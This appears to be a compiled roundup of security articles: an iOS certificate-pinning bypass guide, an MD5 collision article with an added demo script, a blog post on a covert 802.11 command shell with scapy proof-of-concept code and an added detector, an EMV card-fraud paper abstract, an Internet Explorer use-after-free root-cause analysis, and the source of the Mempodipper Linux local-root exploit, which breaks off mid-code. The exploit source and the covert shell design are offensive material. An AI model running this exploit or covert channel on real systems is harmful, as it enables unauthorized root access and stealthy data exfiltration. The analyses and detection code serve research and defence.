To inspect the traffic going via Twitter, ssh into your device and download the iOS SSL Kill Switch package from its releases link. Also, make sure to install the following packages via Cydia:

dpkg
MobileSubstrate
PreferenceLoader

Now install the deb package using the command dpkg -i . Now, respring the device using the command killall -HUP SpringBoard. Once this is done, go to the Settings app. There will be a new menu for SSL Kill Switch and a slider to Disable certificate validation. Make sure the slider is set to on. Now route the traffic in the device to pass through Burp Proxy. Open the Twitter app and now you can see all the data going through the Twitter app as well.

To verify that SSL Kill Switch is being injected into the application, go to Xcode -> Devices (I am using Xcode 6), look for your device in the left menu and click on the arrow pointing up in the lower left corner to see the device logs. You will see that SSL Kill Switch is being injected into the application.

Another cool utility that does the same job is trustme. I recommend you check it out.

Source: iOS Application Security Part 36 – Bypassing certificate pinning using SSL Kill switch - Prateek Gianchandani
  20. Crypto collision used to hijack Windows Update goes mainstream

Final nail in the coffin for the MD5 hash

By John Leyden, 5 Nov 2014

The cryptographic hash collision attack used by cyberspies to subvert Microsoft's Windows Update has gone mainstream, revealing that MD5 is hopelessly broken.

Security researcher Nat McHugh created two images of different rock 'n' roll icons - James Brown and Barry White - with the same MD5 hash. "The images were just two I lifted from the web ... in fact I could have chosen any image or indeed any arbitrary data and created a collision with it," McHugh reports.

The process of computing padding data to produce the collision between two dissimilar image files was carried out on a mainstream cloud computing instance in a matter of hours at a cost estimated by McHugh as being less than a dollar.

Brute force attempts to find cryptographic hash collisions – where two dissimilar files give the same hash value – are still impractical for anyone without access to a supercomputer. What McHugh was able to do was to add binary data to the end of two different JPEG images such that the two modified files gave the same hash value.

Chosen prefix collisions for MD5 of this type were first successfully demonstrated in 2007. In a chosen prefix collision, the data preceding the specially crafted collision blocks can be completely different, as is the case with the images of the Godfather of Soul and the Walrus of Love.

In a blog post, McHugh explains how he was able to work out what binary data to add to the end of the two image files.

The chosen prefix collision attack works by repeatedly adding 'near collision' blocks which gradually work to eliminate the differences in the internal MD5 state until they are the same. Before this can be done the files must be of equal length and the bit differences must be of a particular form. This requires a brute force 'birthday' attack which tries random values until two are found that work. It does however have a much lower complexity than a complete brute force attack. Another researcher, Marc Stevens, has created a framework for automated finding of differential paths and using them to create chosen-prefix collisions: https://code.google.com/p/hashclash/ .

McHugh chose to run Stevens's HashClash research tool on Linux, using a bash script to automate the repetitive steps needed, on an AWS GPU instance. "I found that I was able to run the algorithm in about 10 hours on an AWS large GPU instance" at a cost of around $0.65 plus tax per crack, according to McHugh.

McHugh concludes that his exercise proves MD5 is hopelessly weak, outdated and no longer fit for purpose.

MD5 is well and truly broken. Whilst the two images have not shown a break in the pre-image resistance or second pre-image resistance, I cannot think of a single case where the use of a broken cryptographic hash function is an appropriate choice.

It was a chosen prefix collision attack similar to this that was used to produce a counterfeit SSL certificate used to sign the Flame malware as Microsoft and pass itself off as a Windows update.

Other security experts were inclined to agree with McHugh's conclusion that MD5 is a dead duck. "If you can't even distinguish between Barry White and James Brown, it's time to send MD5 to hashing algorithm heaven," said Martijn Grooten, editor of Virus Bulletin and sometime security researcher, in a Twitter update.

A cryptographic hash algorithm such as MD5 converts data into a shortened "message digest" from which it ought to be impossible to recover the original information. This one-way technique is used to generate digital signatures for software downloads, among other functions.

Bootnote

Flame used a chosen-prefix collision attack against MD5 in order to generate a rogue CA certificate. The sophisticated malware, discovered in 2012 but probably circulating since 2010, was used in a cyber-espionage attack against Middle Eastern countries. Most of the infected systems were located in Iran. The Washington Post claimed in June 2012 that Flame had been jointly developed by the NSA and Israel's military as part of the same Olympic Games operation that spawned Stuxnet. Put very simply, Flame carried out surveillance and mapped networks while Stuxnet sabotaged the control systems of nuclear processing centrifuges.

Source: Crypto collision used to hijack Windows Update goes mainstream • The Register
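As an added illustration, not part of The Register article or of McHugh's work, the Python script below uses the first published MD5 colliding block pair (Wang et al., 2004; the two 128-byte blocks are reproduced from that publication) to show concretely what the article describes: the two inputs differ in only six bytes yet share one MD5 digest, any identical data appended to both keeps them colliding (the property that lets collision blocks be glued onto otherwise unrelated files), and SHA-256 tells them apart. The helper names (`collision_report`, `verify_download`) and the constructed suffix are mine; the `verify_download` function is the defender's side of the story, checking a file against an expected SHA-256 instead of MD5.

```python
import hashlib
import hmac

# The well-known Wang et al. (2004) MD5 collision pair: two 128-byte
# inputs that differ in six bytes (offsets 19, 45, 59, 83, 109, 123)
# but produce the same MD5 digest.
BLOCK_A = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70"
)
BLOCK_B = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70"
)


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def differing_offsets(a: bytes, b: bytes) -> list:
    """Byte offsets at which two equal-length inputs differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def collision_report(a: bytes, b: bytes, suffix: bytes = b"") -> dict:
    """Compare two inputs (optionally with one common suffix appended to both)
    under MD5 and SHA-256.

    MD5 is a Merkle-Damgard construction: once two equal-length inputs have
    driven the compression function into the same internal state, any identical
    suffix keeps the digests equal. That is why collision blocks computed once
    can be appended to arbitrary trailing data.
    """
    a2, b2 = a + suffix, b + suffix
    return {
        "inputs_differ": a2 != b2,
        "differing_offsets": differing_offsets(a2, b2),
        "md5_collides": md5_hex(a2) == md5_hex(b2),
        "sha256_collides": sha256_hex(a2) == sha256_hex(b2),
    }


def verify_download(data: bytes, expected_sha256: str) -> bool:
    """Defender-side check: compare against a published SHA-256 digest rather
    than an MD5 one, using a constant-time comparison."""
    return hmac.compare_digest(sha256_hex(data), expected_sha256.lower())


if __name__ == "__main__":
    print(collision_report(BLOCK_A, BLOCK_B))
    # Constructed suffix standing in for "the rest of the file".
    print(collision_report(BLOCK_A, BLOCK_B, suffix=b"same trailing data in both files"))
    print(verify_download(BLOCK_A, sha256_hex(BLOCK_A)))
```

Run it and the first report shows `md5_collides` true with `sha256_collides` false; the second shows that appending the same trailing bytes to both does not break the MD5 collision. The practical takeaway for anyone still publishing MD5 sums next to downloads is in the last line: an MD5 match proves nothing against an attacker who controls both files, so verification has to rest on SHA-256 (or a signature).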
  21. Smuggler - An interactive 802.11 wireless shell without the need for authentication or association

I've always been fascinated by wireless communications. The ability to launch seemingly invisible packets of information up into the air without even the need to consider aerodynamics itself seems like some kind of magic. In my quest to become a wireless wizard I started looking at the 802.11 wireless protocol to find out a little more about it. I had always noticed when looking at wireless management frames in various packet dumps that a wealth of additional (and somewhat optional) information is sent between stations. Much of this additional information is not all that useful from a security perspective.

This additional information that I speak of is known as "Information Elements" (IE), which are contained in 802.11 wireless management frames [1]. The Dot Eleven wiki states, "IEs are a device's way to transfer descriptive information about itself inside management frames. There are usually several IEs inside each such frame, and each is built of type-length-values mostly defined outside the basic IEEE 802.11 specification." With regards to IEEE 802.11, these information elements are as follows: (0) SSID, (1) Rates, (2) FHset, (3) DSset, (4) CFset, (5) TIM, (6) IBSSset, (16) challenge, (42) ERPinfo, (46) QoS Capability, (47) ERPinfo, (48) RSNinfo, (50) ESRates, (221) vendor and (68) reserved.

I wanted to experiment with these IEs directly. Scapy is a powerful tool that allows such access to this layer via Dot11Elt [2]. Using Scapy I wrote some code to extract the SSID and rates IEs as a proof of concept; the code for this is below.

[receiver.py - note: if you copy/paste from this blog the indentations will need to be fixed]

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
# wireless information elements receiver POC - Tom Neaves <tneaves@trustwave.com>
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *


def packets(pkt):
    if pkt.haslayer(Dot11):
        # if management frame and beacon and SSID is blank
        if pkt.type == 0 and pkt.subtype == 8 and pkt.info == "":
            # second Dot11Elt layer is the Supported Rates IE
            print "AP MAC: %s | SSID: %s | Rates: %s" % (pkt.addr2, pkt.info, pkt[Dot11Elt:2].info)


sniff(iface="mon0", prn=packets)
```

This would extract the "SSID" and the "rates" IEs from all beacon management frames discovered which had a blank SSID.

I then put together some code to act as the sender. Note that I am using an additional wireless card on mon1 to send packets. The receiver is using a different wireless card on mon0 to listen out for our packets.

[sender.py - note: if you copy/paste from this blog the indentations will need to be fixed]

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
# wireless information elements sender PoC - Tom Neaves <tneaves@trustwave.com>
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *

conf.iface = "mon1"  # second wireless card
ssid = sys.argv[1]   # takes ssid from the command line
rates = sys.argv[2]  # takes "rates" from the command line


def SendRates(rates):
    # beacon with a blank SSID and the caller's bytes in the Rates IE
    frame = (RadioTap()
             / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=RandMAC(), addr3=RandMAC())
             / Dot11Beacon(cap="ESS")
             / Dot11Elt(ID="SSID", len=len(ssid), info=ssid)
             / Dot11Elt(ID="Rates", info=rates)
             / Dot11Elt(ID="DSset", info="\x03")
             / Dot11Elt(ID="TIM", info="\x00\x01\x00\x00"))
    sendp(frame, verbose=1)


SendRates(rates)

# python sender.py "" rateshere
```

The command above will result in a beacon management frame sent into the airwaves with a blank SSID and a "rates" information element of "rateshere". The receiver will parse the frame and print the rates content out to the screen, in this case "rateshere". I just utilised an IE in a way not originally intended to pass a message.

At this point I did a little digging to determine if I was the first to stumble on this little gem. Turns out yes and no. Chandra, et al. [3] in 2007 explored hacking up the 802.11 protocol in order to broadcast additional information without the need for association. This was in the form of SSID and BSSID concatenation and adding in additional IEs to broadcast "coupons" for advertising purposes. The paper did not, however, discuss using it as a two-way communications channel. Gupta V. and Rohil M.K. [4] in 2013 hacked up the 802.11 protocol to transmit information within the "Length" fields of the IEs. However, again this is only for broadcast purposes.

So it seems that I am a little late to the party, however it also appears that I am doing things a little differently – I am injecting into the actual IE. Furthermore, the research falls short on being restricted to a one way broadcast. What if I could create a two-way covert communications channel? Furthermore, what could I create without the fuss of association and authentication that is usually required in wireless networks before such communications can begin? What if an attacker could send commands and receive the output on this channel? That would be magic++ and then some. Ladies and gentlemen, I present you Smuggler.

I expanded on the proof of concepts already discussed to create a tool called Smuggler. It is a two-way covert communications channel, which consists of an interactive wireless shell without the need for association or authentication, and it works like this:

An attacker compromises a machine and starts up a receiver (client.py), much like the proof of concept. The receiver listens to management beacon frames with a blank SSID and, when spotted, extracts the rates IE. The evolution here from the proof of concept (v2.0 if you like…) is that the receiver has the operating system parse the rates IE as a command. The attacker leaves the compromised machine with the receiver running and heads off to grab some lunch.

Enter the next act. The attacker comes back the next morning, sitting in the car park with a latte. The attacker uses Smuggler (smuggler.py) to create a management beacon frame (with a blank SSID) and a rates IE with their very own command. Now here comes the clever bit - the receiver parses the command found in the rates IE as already discussed, but wait, it then invokes clientprobe.py to construct management probe requests with the output of the command as the SSID. Smuggler on the attacker's machine is listening out for these management probe requests and extracts the SSID, hence the output. The information is presented in an attractive looking shell not unlike bash.

So, to summarise:

Receiver (client.py): If management and beacon frame (AND blank SSID) seen, read rates (attackers_command) IE and send to the OS to parse. Process attackers_command
Attacker sends commands (smuggler.py): Construct management beacon frame (AND blank SSID) with a custom rates IE. Rates = attackers_command
Exfiltration (clientprobe.py): Management frame, probe request, SSID = outputofcommand

As a proof of concept the same machine is being used with two wireless cards, however, this would work exactly the same on two computers. The example below shows the attacker issuing the "who" command wirelessly (in the "rates" IE) through the wireless card on mon1 in a management beacon frame. The receiver parses this command and sends the output back wirelessly over another wireless card on mon0 via the SSID of a management frame probe request.

What happens "under the hood" within the airwaves is shown below.

Another proof of concept for your viewing pleasure. A number of text files which exist on the victim machine:

The attacker recreates these commands over the wireless airwaves, all without association or authentication.

I am not going to release Smuggler just yet - that is not the objective of this blog post. The objective of this post is that I wanted to share my findings of abusing a protocol in a way not intended and using it for bad things, such as creating this covert two-way communications channel without associating or authenticating. I have also created Anti-Smuggler to demonstrate that it is possible to detect such attacks. However, the proof of concept I have demonstrated is pretty basic in that it does not utilise any form of encryption. You would imagine such covert channels would be reinforced with several layers of security, encryption being just one of them.

For the final treat; Anti-Smuggler detecting extraction of credit cards. The regular expressions can be expanded to cover all manner of things – directory listings, extraction of the passwd file, etc.

[1] Chapter 4 - 802.11 Management frames - DotEleven
[2] scapy: scapy.layers.dot11.Dot11Elt Class Reference - doxygen documentation | Fossies Dox
[3] Chandra R., Padhye J., Ravindranath L., Wolman A. "Beacon-Stuffing: Wi-Fi without Associations", In Proceedings of the Eighth IEEE Workshop Mobile Computing Systems and Applications (Tucson, Arizona, February 26-27, 2007)
[4] Gupta G., Rohil M.K., "Bit-Stuffing in 802.11 Beacon Frame: Embedding Non-Standard Custom Information", International Journal of Computer Applications (0975 – 8887), Volume 63 – No. 2 (February 2013)

Posted by Tom Neaves on 03 November 2014

Source: Smuggler - An interactive 802.11 wireless shell without the need for authentication or association - SpiderLabs
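The detection side that the post only gestures at with Anti-Smuggler, written here as an added example and not the author's tool: a pure-Python parser for the type-length-value information elements in a beacon frame body, and a heuristic that flags the channel described above (a blank-SSID beacon whose Supported Rates IE carries bytes that are not rates). The beacon bodies are constructed inline so the script runs offline without scapy or a monitor-mode card; the rate table, the 8-octet limit and the reason strings are my choices, and a command made only of bytes that happen to be valid rate values would slip past this check, which is why a real detector would also look at the probe-request SSIDs on the return path.

```python
import struct

# Element IDs from the post's list (IEEE 802.11 element IDs).
IE_SSID, IE_RATES, IE_DSSET, IE_TIM = 0, 1, 3, 5

# Standard 802.11b/g rates in 500 kbit/s units (1, 2, 5.5, 6, 9, 11, 12, 18,
# 24, 36, 48, 54 Mbit/s). The high bit marks a "basic" rate and is masked off.
KNOWN_RATES = {2, 4, 11, 12, 18, 22, 24, 36, 48, 72, 96, 108}


def build_beacon_body(ies, interval=100, cap=0x0001):
    """Construct a beacon frame body: 8-byte timestamp, beacon interval,
    capability field, then the IEs as (id, length, value) triples."""
    body = struct.pack("<QHH", 0, interval, cap)
    for eid, value in ies:
        body += struct.pack("BB", eid, len(value)) + value
    return body


def parse_ies(body):
    """Return the (id, value) elements that follow the 12 fixed beacon bytes.

    A truncated trailing element stops parsing instead of raising; a sniffer
    that crashes on a malformed frame is itself a denial-of-service target.
    """
    ies, pos = [], 12
    while pos + 2 <= len(body):
        eid, length = body[pos], body[pos + 1]
        if pos + 2 + length > len(body):
            break
        ies.append((eid, body[pos + 2:pos + 2 + length]))
        pos += 2 + length
    return ies


def suspicious_beacon(body):
    """Heuristic check. Returns a reason string when the beacon looks like a
    smuggled command, or None for a beacon whose rates IE is well-formed."""
    ies = dict(parse_ies(body))
    rates = ies.get(IE_RATES)
    if rates is None:
        return None
    blank = "blank-SSID beacon: " if ies.get(IE_SSID) == b"" else ""
    if len(rates) > 8:
        return blank + "rates IE longer than the 8 octets the standard allows"
    if any((r & 0x7F) not in KNOWN_RATES for r in rates):
        return blank + "rates IE contains values that are not 802.11 rates"
    return None


# Constructed sample frames (not captures): an ordinary access point beacon
# and one carrying the post's "who" example in the rates IE.
LEGIT_BEACON = build_beacon_body([
    (IE_SSID, b"corp-wifi"),
    (IE_RATES, bytes([0x82, 0x84, 0x8B, 0x96, 0x0C, 0x12, 0x18, 0x24])),
    (IE_DSSET, b"\x06"),
])
SMUGGLED_BEACON = build_beacon_body([
    (IE_SSID, b""),
    (IE_RATES, b"who"),
    (IE_DSSET, b"\x03"),
    (IE_TIM, b"\x00\x01\x00\x00"),
])

if __name__ == "__main__":
    for name, frame in (("legit", LEGIT_BEACON), ("smuggled", SMUGGLED_BEACON)):
        print(name, parse_ies(frame), "->", suspicious_beacon(frame))
```

Fed a live capture, the same two functions would sit in a scapy `prn` callback on `bytes(pkt[Dot11Beacon])`; the point of the offline version is that the check is simple enough to run on every beacon without keeping state, since the rates IE has a tiny legitimate alphabet and the covert channel has to use bytes outside it.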
  22. Harvesting High Value Foreign Currency Transactions from EMV Contactless Credit Cards without the PIN

Martin Emms, Budi Arief, Leo Freitas, Joseph Hannon, Aad van Moorsel
School of Computing Science, Newcastle University
Newcastle upon Tyne NE1 7RU, United Kingdom
{martin.emms, budi.arief, leo.freitas, joseph.hannon, aad.vanmoorsel}@ncl.ac.uk

ABSTRACT

In this paper we present an attack, which allows fraudulent transactions to be collected from EMV contactless credit and debit cards without the knowledge of the cardholder. The attack exploits a previously unreported vulnerability in EMV protocol, which allows EMV contactless cards to approve unlimited value transactions without the cardholder's PIN when the transaction is carried out in a foreign currency. For example, we have found that Visa credit cards will approve foreign currency transactions for any amount up to €999,999.99 without the cardholder's PIN; this side-steps the £20 contactless transaction limit in the UK. This paper outlines our analysis methodology that identified the flaw in the EMV protocol, and presents a scenario in which fraudulent transaction details are transmitted over the Internet to a "rogue merchant" who then uses the transaction data to take money from the victim's account. In reality, the criminals would choose a value between €100 and €200, which is low enough to be within the victim's balance and not to raise suspicion, but high enough to make each attack worthwhile. The attack is novel in that it could be operated on a large scale with multiple attackers collecting fraudulent transactions for a central rogue merchant which can be located anywhere in the world where EMV payments are accepted.

Download: http://homepages.cs.ncl.ac.uk/budi.arief/home.formal/Papers/CCS2014.pdf
  23. Root Cause Analysis of CVE-2014-1772 – An Internet Explorer Use After Free Vulnerability

11:04 pm (UTC-7) | by Jack Tang (Threats Analyst)

We see many kinds of vulnerabilities on a regular basis. These range from use-after-free (UAF) vulnerabilities, to type confusion, to buffer overflows, to cross-site scripting (XSS) attacks. It's rather interesting to understand the root cause of each of these vulnerability types, so we looked at the root cause of an Internet Explorer vulnerability - CVE-2014-1772. We'd privately disclosed this vulnerability to Microsoft earlier in the year, and it had been fixed as part of the June Patch Tuesday update, as part of MS14-035. While this vulnerability was already patched some time ago, it is still a good example of UAF vulnerabilities in general.

The code to trigger this vulnerability is below:

Figure 1. HTML code to trigger vulnerability

Before debugging, several flags must be set to make the job of analysis easier. Run the command gflags.exe /i iexplore.exe +hpa +ust to enable the page heap (HPA) and user stack trace (UST) flags. This will make finding memory corruption and tracing heap allocation and frees easier. This file can be found in the Windbg installation folder. You can now run windbg, attach Internet Explorer, and use it to access the HTML file.

Examining the JavaScript execution flow, when line 18 of the HTML code is executed, the crash happens:

Figure 2. Output of crash

We can see the EDI register point to a freed memory space, which leads to an access violation. What is the value of the EDI register? Let us look at the code below.

Figure 3. Assembly code

The above code tells us that the EDI is from the first argument, which is the CTreePos* type. We can assume the EDI is a pointer of CTreePos. Since the CTreePos object is freed, how can we get where the object is freed? Because the UST flag is set, we can use the !heap -p -a edi command in windbg.

Figure 4. Call stack

The above figure shows us the call stack of the CTreePos object freed. The call stack has a lot of information. We see the function CMarkup::FreeTreePos; this gives us evidence that the freed object is a CTreePos object and that this is a use-after-free issue.

Since it is a UAF issue, we want to deeply understand the issue. We need to locate where the CTreePos object is created, where the object is freed, and where the freed object is used again. Figure 4 gives us where the object was freed. To find where it is used again, we need to examine the crash point. The call stack is as follows:

Figure 5. Call stack

How do we find the location where the CTreePos object was created? There are many ways. I prefer to run the sample again, break at the point where the object is freed, and use the !heap -p -a xxxx command to trace back to where the object is created. The call stack is as follows:

Figure 6. Call stack

For UAF problems, I prefer to compare the 3 locations (create, free, use again) to find some clues.

Figure 7. Call stacks

There are 3 columns in Figure 7. They are call stack trace summaries: from left to right, it is when the object is created, freed, and used again. In the above example, the direction of the stack is from the bottom to the top. There is plenty of useful information here. First, we can find the relationship between the 3 parts. Under the yellow line, CDoc::CutCopyMove is the last identical function in the creation call stack trace and the free call stack trace. This means the execution flow creates the CTreePos object and then frees the object in CDoc::CutCopyMove. Under the red line, the execution flow frees the object and then uses it again (and crashes) in CSpliceTreeEngine::InsertSplice. In the second column, we find the execution flow in the CSpliceTreeEngine::InsertSplice function encounters a failure and calls the Fire_onerror function. The function will call the JavaScript object's onerror event. At the event, the execution will call CMarkupPointer::UnEmbed to free the object.

Right away, we have four questions.

Why does it trigger an onerror event?
Why does it create the CTreePos object?
Why does it free the CTreePos object?
Why does it use the freed object again?

Before answering these questions, I want to summarize some background knowledge about Internet Explorer's DOM tree implementation. Because IE is not open source, this information is gathered by reverse engineering, so it may not be 100% accurate.

One page has a CMarkup object to represent the page's skeleton or DOM tree. The CMarkup object contains a pointer to the root CElement object. This is the parent class of many concrete element classes. In Figure 1, the JavaScript objects e_1 and e_2 are the CObjectElement objects which are inherited from CElement. The CElement object has a pointer to a CTreeNode object. The CTreeNode object also has a pointer to a related CElement object. The CTreeNode object has a pair of pointers to CTreePos objects. Why is a CTreePos object needed? This is because IE uses a Splay Tree algorithm to manipulate the DOM tree. In the Splay Tree, the CTreePos object is the node that is involved in the algorithm. The CMarkupPointer object represents a location in the CMarkup object (DOM tree). So the CMarkupPointer object has a pointer to CTreePos to represent its location. CMarkupPointer has several statuses which are related to UAF issues.

Embed status: this means CMarkupPointer created CTreePos, which is added to the Splay Tree.
Unembed status: this means CMarkupPointer removes the CTreePos from the Splay Tree and frees it.

The following graph describes the interactions involving the splay tree.

Figure 8. Splay tree graph

Going back to our four questions, we can now attempt to answer them.

Why does it trigger an onerror event?

From Figure 1's JavaScript code, we can see e_2.onerror sets a handler function. At line 22, e_2.swapNode will trigger the DOM tree's changing; this calls the CObjectElement::CreateObject function. This function checks the object's CLSID. Because e_2's CLSID is not set, it triggers the onerror event handler. In the handler, at line 22, the JavaScript code r.insertNode(e_2) will change the DOM tree once again and change CObjectElement::CreateObject as well; because e_2 has no CLSID, it will again trigger the onerror event handler. The second time this handler runs, at r.setEnd(document.all[1],0), it frees the CTreePos object.

Why does it create the CTreePos object?

From Figure 6, the CTreePos object is created in calling the CDomRange::InsertNode function. We can map this function to Figure 1's line 19: r.insertNode(e_2). The CDomRange::InsertNode function will insert elements into the DOM tree. The function calls Doc::CutCopyMove to modify the DOM tree, which takes several arguments. The first CMarkupPointer type argument is the source start location in CMarkup (DOM tree). The second CMarkupPointer type argument is the source end location in CMarkup (DOM Tree). The third CMarkupPointer type argument is the target location in CMarkup (DOM Tree). Doc::CutCopyMove will copy or move the source sub DOM tree to the target location in DOM tree. Because of the use of the Splay Tree algorithm (which uses CTreePos as a node), the function needs to create a CTreePos object and add it to the SplayTree for source CMarkup (DOM tree) and target CMarkup (DOM Tree). Doc::CutCopyMove calls CMarkup::DoEmbedPointers to let the CMarkupPointer change to embed status. Finally, the CTreePos object is created. The UAF CTreePos object is created for the e_1 JavaScript element.

Why does it free the CTreePos object?

From the call stack trace when the CTreePos object is freed (Figure 4), we can find CDomRange::setEnd. This function can be mapped to line 17 in Figure 1: r.setEnd(e_1,0). That means the CTreePos object is in the implementation of setEnd. The CDomRange::setEnd function wants to replace the original end point with a new end point. This function finally calls CMarkupPointer::MoveToPointer to move to the specific DOM tree location. It will first call CMarkupPointer::UnEmbed to change this CMarkupPointer object to unembed and remove CTreePos from the Splay Tree and free it. The JavaScript code r.setEnd's argument is the e_1 element. So the CTreePos object related with the e_1 element is freed.

Why does it use the freed object again?

In Figure 7, under the red line is the function call for CSpliceTreeEngine::InsertSplice. Column B is CSpliceTreeEngine::InsertSplice+0x13ff. Column C is CSpliceTreeEngine::InsertSplice+0x6EDD4A. Column B is the free call stack trace and Column C is the "used again" crash call stack trace. This means that both "free" and "used again" happen in one function called CSpliceTreeEngine::InsertSplice. We trace the execution flow in this function, and find the following:

Figure 9. Assembly code

At instruction 636898C4, eax is the address of the UAF CTreePos object. The function saves the address to a local variable var_1E4. Then, it proceeds to 6368AA9A.

Figure 10. Assembly code

At 6368AA9A, it calls a virtual function CObjectElement::Notify. We can find here the call stack trace from Figure 7's column B. This means when running this call, it encounters an error and calls the onerror event handler. That frees the CTreePos object. However, the CSpliceTreeEngine::InsertSplice function local variable var_1E4 holds a reference to this freed object. It then proceeds to 63D7735B. At 63D7735B, it calls CElement::RecordTextChangeForTsf with var_1E4 as the second argument. When this function is run, if any instruction accesses the contents of the CTreePos object, a crash occurs.

Summary

In brief, the UAF issue's root cause is that under the event interaction context, CSpliceTreeEngine::InsertSplice doesn't handle local variable reference validation properly. DOM is based on event mechanisms. Under complex event interaction contexts, it is a significant challenge to solve UAF issues completely. However, in recent patches Microsoft has introduced memory protection in Internet Explorer, which helps mitigate UAF issues (especially in cases where a UAF object is referenced from the call stack). This highlights one important reason to upgrade to the latest versions of software as much as possible: frequently, new techniques that make exploits more difficult are part of newer versions, making the overall security picture better.

Trend Micro Deep Security protects users against this particular threat. The following rule, released as part of the regular updates released in June, is applicable:

1006036 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-1772)

Source: Root Cause Analysis of CVE-2014-1772 - An Internet Explorer Use After Free Vulnerability | Security Intelligence Blog | Trend Micro
  24. Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2

Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
Blog post about it is here: http://blog.zx2c4.com/749

```c
/*
 * Mempodipper
 * by zx2c4
 *
 * Linux Local Root Exploit
 *
 * Rather than put my write up here, per usual, this time I've put it
 * in a rather lengthy blog post: http://blog.zx2c4.com/749
 *
 * Enjoy.
 *
 * - zx2c4
 * Jan 21, 2012
 *
 * CVE-2012-0056
 */

#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <sys/reg.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>

char *prog_name;

int send_fd(int sock, int fd)
{
	char buf[1];
	struct iovec iov;
	struct msghdr msg;
	struct cmsghdr *cmsg;
	int n;
	char cms[CMSG_SPACE(sizeof(int))];

	buf[0] = 0;
	iov.iov_base = buf;
	iov.iov_len = 1;

	memset(&msg, 0, sizeof msg);
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = (caddr_t)cms;
	msg.msg_controllen = CMSG_LEN(sizeof(int));

	cmsg = CMSG_FIRSTHDR(&msg);
	cmsg->cmsg_len = CMSG_LEN(sizeof(int));
	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS;
	memmove(CMSG_DATA(cmsg), &fd, sizeof(int));

	if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
		return -1;
	close(sock);
	return 0;
}

int recv_fd(int sock)
{
	int n;
	int fd;
	char buf[1];
	struct iovec iov;
	struct msghdr msg;
	struct cmsghdr *cmsg;
	char cms[CMSG_SPACE(sizeof(int))];

	iov.iov_base = buf;
	iov.iov_len = 1;

	memset(&msg, 0, sizeof msg);
	msg.msg_name = 0;
	msg.msg_namelen = 0;
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;

	msg.msg_control = (caddr_t)cms;
	msg.msg_controllen = sizeof cms;

	if ((n = recvmsg(sock, &msg, 0)) < 0)
		return -1;
	if (n == 0)
		return -1;
	cmsg = CMSG_FIRSTHDR(&msg);
	memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
	close(sock);
	return fd;
}

unsigned long ptrace_address()
{
	int fd[2];
	printf("[+] Creating ptrace pipe.\n");
	pipe(fd);
	fcntl(fd[0], F_SETFL, O_NONBLOCK);

	printf("[+] Forking ptrace child.\n");
	int child = fork();
	if (child) {
		close(fd[1]);
		char buf;
		printf("[+] Waiting for ptraced child to give output on syscalls.\n");
		for (;;) {
			wait(NULL);
			if (read(fd[0], &buf, 1) > 0)
				break;
			ptrace(PTRACE_SYSCALL, child, NULL, NULL);
		}
		printf("[+] Error message written. Single stepping to find address.\n");
		struct user_regs_struct regs;
		for (;;) {
			ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
			wait(NULL);
			ptrace(PTRACE_GETREGS, child, NULL, &regs);
#if defined(__i386__)
#define instruction_pointer regs.eip
#define upper_bound 0xb0000000
#elif defined(__x86_64__)
#define instruction_pointer regs.rip
#define upper_bound 0x700000000000
#else
#error "That platform is not supported."
#endif
			if (instruction_pointer < upper_bound) {
				unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
				if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
					return instruction_pointer;
			}
		}
	} else {
		printf("[+] Ptrace_traceme'ing process.\n");
		if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
			perror("[-] ptrace");
			return 0;
		}
		close(fd[0]);
		dup2(fd[1], 2);
		execl("/bin/su", "su", "not-a-valid-user", NULL);
	}
	return 0;
}

unsigned long objdump_address()
{
	FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
	if (!command) {
		perror("[-] popen");
		return 0;
	}
	char result[32];
	fgets(result, 32, command);
	pclose(command);
	return strtoul(result, NULL, 16);
}

unsigned long find_address()
{
	printf("[+] Ptracing su to find next instruction without reading binary.\n");
	unsigned long address = ptrace_address();
	if (!address) {
		printf("[-] Ptrace failed.\n");
		printf("[+] Reading su binary with objdump to find exit@plt.\n");
		address = objdump_address();
		if (address == ULONG_MAX || !address) {
			printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
